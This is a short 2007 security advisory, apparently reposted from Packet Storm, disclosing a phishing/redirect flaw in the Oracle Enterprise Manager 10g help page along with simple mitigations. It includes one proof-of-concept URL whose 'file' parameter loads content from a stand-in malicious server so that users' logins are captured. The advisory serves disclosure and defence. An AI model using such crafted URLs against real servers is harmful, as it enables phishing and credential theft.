Home / vulnerabilities oem-redir.txt
Posted on 27 March 2007
Source : packetstormsecurity.org Link
------=_Part_245915_32631201.1174835973515
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Product: Oracle Entreprise manager
Vulnerabilities: Phishing
Level: Medium
By: Handrix <handrix_at_morx_org>
25 March 2007
MorX security research team
www.morx.org
The oracle entreprise manager are vulnerable to phishing attack in help
rubric,
an attacker can redirect your login and password to an another malicious
website.
Any way feel free to verify the whole login page contenent before making
your sensible information on.
Other solution deactivate the help link
Simple request :
http://www.victimeserver.com:5500/em/console/help/fr/topic?inOHW=false&linkHelp=false&file=http://www.maliciousserver.dot:5500/em/console/
Version: Oracle entreprise manager 10g
May be others
------=_Part_245915_32631201.1174835973515
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Product: Oracle Entreprise manager <br>Vulnerabilities: Phishing <br>Level: Medium<br>By: Handrix <handrix_at_morx_org><br>25 March 2007<br>MorX security research team<br><a href="http://www.morx.org">www.morx.org</a>
<br><br>The oracle entreprise manager are vulnerable to phishing attack in help rubric,<br>an attacker can redirect your login and password to an another malicious website.<br>Any way feel free to verify the whole login page contenent before making your sensible information on.
<br><br>Other solution deactivate the help link<br><br>Simple request :<br><a href="http://www.victimeserver.com:5500/em/console/help/fr/topic?inOHW=false&linkHelp=false&file=http://www.maliciousserver.dot:5500/em/console/">
http://www.victimeserver.com:5500/em/console/help/fr/topic?inOHW=false&linkHelp=false&file=http://www.maliciousserver.dot:5500/em/console/</a><br><br><br>Version: Oracle entreprise manager 10g<br>May be others<br>
------=_Part_245915_32631201.1174835973515--